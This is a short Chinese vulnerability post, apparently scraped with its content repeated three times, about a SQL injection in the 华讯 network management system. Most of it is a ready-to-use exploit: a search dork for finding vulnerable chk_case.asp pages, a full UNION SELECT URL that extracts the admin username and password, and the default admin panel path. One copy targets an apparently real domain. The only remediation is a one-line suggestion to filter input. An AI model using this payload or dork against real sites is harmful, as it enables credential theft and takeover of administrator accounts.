华讯网络管理系统注入SQLreject
时间:2010-10-29 来源:linuxfly
华讯网络管理系统注入
漏洞类型:SQL注入
漏洞描述:华讯网络管理系统存在SQL注入,可获取管理员用户密码信息。
关键字:inurl:chk_case.asp
漏洞测试:
http://www.website.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin
默认后台:
http://www.website.com/admin/
修复方案:建议加强过滤,防止SQL注入攻击。
华讯网络管理系统漏洞 SQL防注入
漏洞类型:SQL注入
漏洞描述:华讯网络管理系统存在SQL注入,可获取管理员用户密码信息。
关键字:inurl:chk_case.asp
漏洞测试:
http://www.website.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin
默认后台:
http://www.website.com/admin/
修复方案:建议加强过滤,防止SQL注入攻击。
华讯网络管理系统注入
关键字:inurl:chk_case.asp
test:
http://www.linuxe.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin
默认后台:
http://www.linuxe.com/admin/
华讯网络管理系统漏洞 SQL防注入
相关阅读 更多 +
